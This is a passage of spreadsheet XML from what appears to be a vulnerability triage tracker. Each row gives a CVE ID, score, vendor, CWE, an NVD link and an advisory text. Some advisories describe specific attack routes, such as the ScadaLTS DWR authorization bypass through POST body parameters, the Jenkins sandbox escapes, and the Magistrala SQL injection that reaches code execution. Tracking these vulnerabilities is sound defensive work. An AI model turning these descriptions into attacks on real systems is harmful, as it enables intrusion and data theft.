      <c r="H54" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I54" s="5" t="inlineStr"/>
      <c r="J54" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K54"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54" s="5" t="inlineStr"/>
      <c r="M54" s="5" t="inlineStr"/>
      <c r="N54" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O54" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P54" s="5" t="inlineStr"/>
      <c r="Q54" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R54" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S54" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69860</t>
        </is>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B55" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C55" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70203</t>
        </is>
      </c>
      <c r="D55" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E55" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F55" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G55" s="5" t="inlineStr"/>
      <c r="H55" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I55" s="5" t="inlineStr"/>
      <c r="J55" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K55"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55" s="5" t="inlineStr"/>
      <c r="M55" s="5" t="inlineStr"/>
      <c r="N55" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O55" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P55" s="5" t="inlineStr"/>
      <c r="Q55" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R55" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Media Player allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S55" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70203</t>
        </is>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B56" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C56" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71336</t>
        </is>
      </c>
      <c r="D56" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E56" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F56" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G56" s="5" t="inlineStr"/>
      <c r="H56" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I56" s="5" t="inlineStr"/>
      <c r="J56" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K56" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L56" s="5" t="inlineStr"/>
      <c r="M56" s="5" t="inlineStr"/>
      <c r="N56" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O56" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P56" s="5" t="inlineStr"/>
      <c r="Q56" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R56" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Work Folder Service allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S56" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71336</t>
        </is>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B57" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C57" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76409</t>
        </is>
      </c>
      <c r="D57" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E57" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F57" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G57" s="5" t="inlineStr"/>
      <c r="H57" s="5" t="inlineStr"/>
      <c r="I57" s="5" t="inlineStr"/>
      <c r="J57" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K57" s="5" t="inlineStr"/>
      <c r="L57" s="5" t="inlineStr"/>
      <c r="M57" s="5" t="inlineStr"/>
      <c r="N57" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O57" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P57" s="5" t="inlineStr"/>
      <c r="Q57" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R57" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Nexus Dashboard engineering team has conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities.
The vulnerabilities tracked by CVE-2026-76409 are related to improper limitation of a pathname issues that are grouped under the Common Weakness Enumeration (CWE) CWE-22.</t>
        </is>
      </c>
      <c r="S57" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76409</t>
        </is>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B58" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C58" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77495</t>
        </is>
      </c>
      <c r="D58" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E58" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F58" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G58" s="5" t="inlineStr"/>
      <c r="H58" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I58" s="5" t="inlineStr"/>
      <c r="J58" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K58"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58" s="5" t="inlineStr"/>
      <c r="M58" s="5" t="inlineStr"/>
      <c r="N58" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O58" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P58" s="5" t="inlineStr"/>
      <c r="Q58" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R58" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S58" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77495</t>
        </is>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B59" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C59" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84860</t>
        </is>
      </c>
      <c r="D59" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E59" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F59" s="5" t="inlineStr">
        <is>
          <t>vulnreport@tenable.com</t>
        </is>
      </c>
      <c r="G59" s="5" t="inlineStr"/>
      <c r="H59" s="5" t="inlineStr"/>
      <c r="I59" s="5" t="inlineStr"/>
      <c r="J59" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="K59" s="5" t="inlineStr"/>
      <c r="L59" s="5" t="inlineStr"/>
      <c r="M59" s="5" t="inlineStr"/>
      <c r="N59" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O59" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P59" s="5" t="inlineStr"/>
      <c r="Q59" s="5" t="inlineStr"/>
      <c r="R59" s="5" t="inlineStr">
        <is>
          <t>ScadaLTS 2.8.1-release-candidate build 0 is affected by an Authorization Bypass
Spring Security gates DWR endpoints by URL path pattern, but DWR itself dispatches method calls based on the POST body parameters c0-scriptName and c0-methodName. The crossDomainSessionSecurity setting in web.xml is set to false, which disables DWR's built-in origin validation. This means any authenticated user can invoke any DWR method (regardless of the URL-based access control) by sending their request to a URL they are permitted to access (e.g. MiscDwr.initializeLongPoll.dwr) while targeting a restricted class in the POST body.
This is the systemic root cause that enables multiple other findings to be exploited as a low privilege user.</t>
        </is>
      </c>
      <c r="S59" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84860</t>
        </is>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B60" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C60" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92122</t>
        </is>
      </c>
      <c r="D60" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E60" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F60" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G60" s="5" t="inlineStr"/>
      <c r="H60" s="5" t="inlineStr"/>
      <c r="I60" s="5" t="inlineStr"/>
      <c r="J60" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K60" s="5" t="inlineStr"/>
      <c r="L60" s="5" t="inlineStr"/>
      <c r="M60" s="5" t="inlineStr"/>
      <c r="N60" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O60" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P60" s="5" t="inlineStr"/>
      <c r="Q60" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="R60" s="5" t="inlineStr">
        <is>
          <t>Jenkins Script Security Plugin 1415.v9a_f9b_3a_c253d and earlier does not check the method called through the proxy created when a sandboxed script coerces a value to an interface, if the value inherits a method of the same name as an interface method, allowing attackers with permission to define and run sandboxed scripts, including Pipelines, to bypass the sandbox protection and execute arbitrary code in the context of the Jenkins controller JVM.</t>
        </is>
      </c>
      <c r="S60" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92122</t>
        </is>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B61" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C61" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92123</t>
        </is>
      </c>
      <c r="D61" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E61" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F61" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G61" s="5" t="inlineStr"/>
      <c r="H61" s="5" t="inlineStr"/>
      <c r="I61" s="5" t="inlineStr"/>
      <c r="J61" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K61" s="5" t="inlineStr"/>
      <c r="L61" s="5" t="inlineStr"/>
      <c r="M61" s="5" t="inlineStr"/>
      <c r="N61" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O61" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P61" s="5" t="inlineStr"/>
      <c r="Q61" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="R61" s="5" t="inlineStr">
        <is>
          <t>Jenkins Script Security Plugin 1415.v9a_f9b_3a_c253d and earlier does not intercept operations performed on a null receiver (method calls, property and attribute accesses, and array accesses), allowing attackers with permission to define and run sandboxed scripts, including Pipelines, to bypass the sandbox protection and execute arbitrary code in the context of the Jenkins controller JVM.</t>
        </is>
      </c>
      <c r="S61" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92123</t>
        </is>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B62" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C62" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92124</t>
        </is>
      </c>
      <c r="D62" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E62" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F62" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G62" s="5" t="inlineStr"/>
      <c r="H62" s="5" t="inlineStr"/>
      <c r="I62" s="5" t="inlineStr"/>
      <c r="J62" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K62" s="5" t="inlineStr"/>
      <c r="L62" s="5" t="inlineStr"/>
      <c r="M62" s="5" t="inlineStr"/>
      <c r="N62" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O62" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P62" s="5" t="inlineStr"/>
      <c r="Q62" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="R62" s="5" t="inlineStr">
        <is>
          <t>Jenkins Script Security Plugin 1415.v9a_f9b_3a_c253d and earlier checks the operations Groovy will perform with the elements it reads from a collection that a sandboxed script casts to another type but performs the cast on the collection itself, allowing attackers with permission to define and run sandboxed scripts, including Pipelines, to bypass the sandbox protection and execute arbitrary code in the context of the Jenkins controller JVM.</t>
        </is>
      </c>
      <c r="S62" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92124</t>
        </is>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B63" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C63" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92125</t>
        </is>
      </c>
      <c r="D63" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E63" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F63" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G63" s="5" t="inlineStr"/>
      <c r="H63" s="5" t="inlineStr"/>
      <c r="I63" s="5" t="inlineStr"/>
      <c r="J63" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K63" s="5" t="inlineStr"/>
      <c r="L63" s="5" t="inlineStr"/>
      <c r="M63" s="5" t="inlineStr"/>
      <c r="N63" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O63" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P63" s="5" t="inlineStr"/>
      <c r="Q63" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R63" s="5" t="inlineStr">
        <is>
          <t>Jenkins Script Security Plugin 1415.v9a_f9b_3a_c253d and earlier does not reject the @GroovyASTTransformationClass annotation, allowing attackers with permission to define and run sandboxed scripts, including Pipelines, to run an arbitrary AST transformation at compile time, bypassing the sandbox protection and executing arbitrary code in the context of the Jenkins controller JVM.</t>
        </is>
      </c>
      <c r="S63" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92125</t>
        </is>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B64" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C64" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92137</t>
        </is>
      </c>
      <c r="D64" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E64" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F64" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G64" s="5" t="inlineStr"/>
      <c r="H64" s="5" t="inlineStr"/>
      <c r="I64" s="5" t="inlineStr"/>
      <c r="J64" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K64" s="5" t="inlineStr"/>
      <c r="L64" s="5" t="inlineStr"/>
      <c r="M64" s="5" t="inlineStr"/>
      <c r="N64" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O64" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P64" s="5" t="inlineStr"/>
      <c r="Q64" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R64" s="5" t="inlineStr">
        <is>
          <t>Jenkins Robot Framework Plugin 6.2.2 and earlier does not check that the archive directory configured for Robot Framework report files is contained within the build directory on the Jenkins controller, allowing attackers with Item/Configure permission to create or replace arbitrary files on the Jenkins controller file system with attacker-specified content, which can lead to remote code execution.</t>
        </is>
      </c>
      <c r="S64" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92137</t>
        </is>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B65" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C65" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92466</t>
        </is>
      </c>
      <c r="D65" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E65" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F65" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G65" s="5" t="inlineStr"/>
      <c r="H65" s="5" t="inlineStr"/>
      <c r="I65" s="5" t="inlineStr"/>
      <c r="J65" s="5" t="inlineStr">
        <is>
          <t>elastic</t>
        </is>
      </c>
      <c r="K65" s="5" t="inlineStr"/>
      <c r="L65" s="5" t="inlineStr"/>
      <c r="M65" s="5" t="inlineStr"/>
      <c r="N65" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O65" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P65" s="5" t="inlineStr"/>
      <c r="Q65" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R65" s="5" t="inlineStr">
        <is>
          <t>zlt2000 microservices-platform through 6.0.0 contains a missing authorization vulnerability where the zlt.security.auth.urlPermission.enable flag defaults to false, disabling all permission checks after authentication. Authenticated users with no roles can access administrative APIs including user management, role assignment, and Elasticsearch index operations by bypassing the disabled authorization enforcement.</t>
        </is>
      </c>
      <c r="S65" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92466</t>
        </is>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B66" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C66" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92762</t>
        </is>
      </c>
      <c r="D66" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E66" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F66" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G66" s="5" t="inlineStr"/>
      <c r="H66" s="5" t="inlineStr"/>
      <c r="I66" s="5" t="inlineStr"/>
      <c r="J66" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="K66" s="5" t="inlineStr"/>
      <c r="L66" s="5" t="inlineStr"/>
      <c r="M66" s="5" t="inlineStr"/>
      <c r="N66" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O66" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P66" s="5" t="inlineStr"/>
      <c r="Q66" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R66" s="5" t="inlineStr">
        <is>
          <t>Pelican Panel versions before 1.0.0-beta35 enforce startup write permissions only through disabled form controls rather than server-side authorization checks. Attackers with startup.read permission can craft Livewire state updates to invoke afterStateUpdated callbacks and modify startup commands, docker images, and variables to execute arbitrary commands in the container.</t>
        </is>
      </c>
      <c r="S66" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92762</t>
        </is>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B67" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C67" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82028</t>
        </is>
      </c>
      <c r="D67" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E67" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F67" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G67" s="5" t="inlineStr"/>
      <c r="H67" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I67" s="5" t="inlineStr"/>
      <c r="J67" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="K67" s="5" t="inlineStr"/>
      <c r="L67" s="5" t="inlineStr"/>
      <c r="M67" s="5" t="inlineStr"/>
      <c r="N67" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O67" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P67" s="5" t="inlineStr"/>
      <c r="Q67" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R67" s="5" t="inlineStr">
        <is>
          <t>Magistrala before 1.0.0 contains a SQL injection vulnerability in the timescale-reader and postgres-reader HTTP API services that allows authenticated attackers to inject arbitrary SQL by supplying a malicious format query parameter that is interpolated directly into the FROM clause without parameterization or identifier quoting. Attackers with a self-registered account can substitute arbitrary subqueries to achieve cross-tenant database reads, extract pg_shadow password hashes, read and write arbitrary files, and execute arbitrary code as the postgres OS user by loading attacker-supplied shared objects, with all injected SQL executing at superuser privilege due to the default PostgreSQL role configuration.</t>
        </is>
      </c>
      <c r="S67" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82028</t>
        </is>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B68" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C68" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82064</t>
        </is>
      </c>
      <c r="D68" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E68" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F68" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G68" s="5" t="inlineStr"/>
      <c r="H68" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I68" s="5" t="inlineStr"/>
      <c r="J68" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K68" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L68" s="5" t="inlineStr"/>
      <c r="M68" s="5" t="inlineStr"/>
      <c r="N68" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O68" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P68" s="5" t="inlineStr"/>
      <c r="Q68" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="R68" s="5" t="inlineStr">
        <is>
          <t>A security issue in MongoDB Server allows an unauthenticated network user to cause a denial of service on a specific type of replica set member. The server contains an assertion in its read concern processing logic that can be reached without authentication, and the assertion's assumptions about internal state do not hold for all member configurations, causing the server process to terminate.</t>
        </is>
      </c>
      <c r="S68" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82064</t>
        </is>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B69" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C69" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82075</t>
        </is>
      </c>
      <c r="D69" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E69" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F69" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G69" s="5" t="inlineStr"/>
      <c r="H69" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I69" s="5" t="inlineStr"/>
      <c r="J69" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K69" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L69" s="5" t="inlineStr"/>
      <c r="M69" s="5" t="inlineStr"/>
      <c r="N69" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O69" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P69" s="5" t="inlineStr"/>
      <c r="Q69" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R69" s="5" t="inlineStr">
        <is>
          <t>An uncontrolled resource consumption weakness exists in the request-handling path of the MongoDB sharded-cluster router process. A client that has network access to a router port and has not authenticated can supply connection-monitoring parameters that cause the server to expend CPU resources without any rate limiting, degrading or denying service to legitimate clients. No authentication, elevated privileges, or user interaction is required. Only availability is affected; data confidentiality and integrity are not impacted.</t>
        </is>
      </c>
      <c r="S69" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82075</t>
        </is>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B70" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C70" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20135</t>
        </is>
      </c>
      <c r="D70" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E70" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F70" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G70" s="5" t="inlineStr"/>
      <c r="H70" s="5" t="inlineStr"/>
      <c r="I70" s="5" t="inlineStr"/>
      <c r="J70" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K70" s="5" t="inlineStr"/>
      <c r="L70" s="5" t="inlineStr"/>
      <c r="M70" s="5" t="inlineStr"/>
      <c r="N70" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O70" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P70" s="5" t="inlineStr"/>
      <c r="Q70" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="R70" s="5" t="inlineStr">
        <is>
